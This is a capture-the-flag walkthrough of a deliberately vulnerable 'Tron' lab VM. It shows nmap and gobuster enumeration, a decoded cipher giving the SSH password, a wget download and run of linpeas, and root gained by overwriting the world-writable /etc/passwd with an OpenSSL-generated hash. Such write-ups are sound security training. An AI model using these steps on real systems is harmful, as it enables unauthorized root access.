The enumeration phase involved scanning for open ports and directories using tools like nmap and gobuster, revealing SSH and HTTP services. Further exploration uncovered a cipher that, when decrypted, provided the SSH password.
Exploitation proceeded by logging in as the user “player” via SSH and conducting privilege escalation. This was achieved by exploiting a writable /etc/passwd file to replace the root user’s hash with a generated hash, granting root access. Finally, the root flag (root.txt) was obtained, demonstrating successful penetration.
The process highlights the importance of thorough enumeration, leveraging vulnerabilities, and understanding privilege escalation techniques in penetration testing.
vm link
» Machine IP
» Make a new directory for machine and change to that directory
1
2
3
4
5
| ┌──(kali㉿kali)-[~]
└─$ cd Desktop/tron
┌──(kali㉿kali)-[~/Desktop/tron]
└─$
|
» Create a variable for the IP to avoid retyping the address each time
1
2
| ┌──(kali㉿kali)-[~/Desktop/tron]
└─$ ip=192.168.0.134
|
Enumeration
» Scan for open ports and services using nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| ┌──(kali㉿kali)-[~/Desktop/tron]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-19 16:17 EST
Nmap scan report for 192.168.0.134
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1f:ed:64:93:84:b5:b2:e8:af:5a:0e:6f:52:af:4b:48 (RSA)
| 256 3d:df:6f:02:13:9e:15:f8:51:94:30:f8:45:e3:f2:93 (ECDSA)
|_ 256 2f:f4:af:e1:f4:c4:a5:3b:50:bb:e5:b9:2a:9f:39:de (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Master Control Program
MAC Address: 08:00:27:51:AD:0E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.0.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.83 seconds
|
- Port 80 http & 22 ssh are open
Inspecting the page we found something
»Let’s further look for sub directories
1
2
3
4
5
6
7
8
9
10
11
| ┌──(kali㉿kali)-[~/Desktop/tron]
└─$ gobuster dir -w ~/Desktop/wl/dlm2.3.txt -q -x php,html,txt -u $ip
/.html (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 309]
/img (Status: 301) [Size: 312] [--> http://192.168.0.134/img/]
/manual (Status: 301) [Size: 315] [--> http://192.168.0.134/manual/]
/robots.txt (Status: 200) [Size: 623]
/font (Status: 301) [Size: 313] [--> http://192.168.0.134/font/]
/.html (Status: 403) [Size: 278]
/MCP (Status: 301) [Size: 312] [--> http://192.168.0.134/MCP/]
/server-status (Status: 403) [Size: 278]
|
Look into /MCP
Look further into all directories
Decrypt
1
2
3
| ┌──(kali㉿kali)-[~/Desktop/tron]
└─$ echo "KysrKysrKysrK1s+Kz4rKys+KysrKysrKz4rKysrKysrKysrPDw8PC1dPj4+PisrKysrKysrKysrKy4tLS0tLi0tLS0tLS0tLS0tLisrKysrKysrKysrKysrKysrKysrKysrKy4tLS0tLS0tLS0tLS0tLS0tLS0tLS4rKysrKysrKysrKysrLg==" | base64 -d
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.
|
- {++++++++++[>+>+++>+++++++>++++++++++««-]»»++++++++++++.—-.———–.++++++++++++++++++++++++.——————–.+++++++++++++.} is a brainfuck code upon decrypting this we get the answer
player
Decode here https://www.dcode.fr/brainfuck-language/
https://cyberchef.org/
> select substitute
Exploitation
»Let’s SSH player
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(kali㉿kali)-[~/Desktop/tron]
└─$ ssh player@192.168.0.134
player@192.168.0.134's password:
Linux tron 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
player@tron:~$
|
- We have successfully gained access as a player so now we can have user.txt
»Download linpeas.sh in /tmp
- execution permissions - chmod +x linpeas.sh
- execute ./linpeas.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
| player@tron:~$ cd /tmp
player@tron:/tmp$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh--2024-02-19 17:27:33-- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... 20.207.73.82
Connecting to github.com (github.com)|20.207.73.82|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/carlospolop/PEASS-ng/releases/download/20240218-68f9adb3/linpeas.sh [following]
--2024-02-19 17:27:33-- https://github.com/carlospolop/PEASS-ng/releases/download/20240218-68f9adb3/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/239d1c00-29ae-494d-b854-13f9186ab794?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240219%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240219T222733Z&X-Amz-Expires=300&X-Amz-Signature=93062865224ad47835a422e954214e344c5add2a465b2f338c7a14103572aefb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2024-02-19 17:27:33-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/239d1c00-29ae-494d-b854-13f9186ab794?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240219%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240219T222733Z&X-Amz-Expires=300&X-Amz-Signature=93062865224ad47835a422e954214e344c5add2a465b2f338c7a14103572aefb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 853186 (833K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[================================>] 833.19K 5.30MB/s in 0.2s
2024-02-19 17:27:35 (5.30 MB/s) - ‘linpeas.sh’ saved [853186/853186]
player@tron:
player@tron:
player@tron:
player@tron:/tmp$ chmod +x linpeas.sh
player@tron:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
|
Look for this /etc/passwd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/passwd
/home/player
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory
/var/tmp
|
1
2
3
| player@tron:/tmp$ ls -al /etc/passwd
-rw-r--rw- 1 root root 1491 Feb 18 20:08 /etc/passwd
player@tron:/tmp$
|
» Use OpenSSL to generate a password hash. For example, to generate a SHA-512 password hash
1
2
3
| player@tron:/tmp$ openssl passwd -6 -salt xyz YourNewPassword
$6$xyz$D40Xiunwen0vq4qX8leZ1/B7.cGpEYJtOvLxWXBJpkJtRqhVKYdb5gYUWkVI6gRrcnFpl5Xc279s7Z7M0P5Ao1
player@tron:/tmp$
|
Now we paste this hash in /etc/passwd, replacing “x” in root
- root:x:0:0:root:/root:/bin/bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| root:$6$xyz$D40Xiunwen0vq4qX8leZ1/B7.cGpEYJtOvLxWXBJpkJtRqhVKYdb5gYUWkVI6gRrcnFpl5Xc279s7Z7M0P5Ao1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
player:x:1000:1000:player,,,:/home/player:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
Once we replace hash we have access to root with password YourNewPassword
1
2
3
4
5
6
7
8
| player@tron:/tmp$ su root
Password:
root@tron:/tmp#
root@tron:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tron:~# ls /root
root.txt
root@tron:~#
|
pwned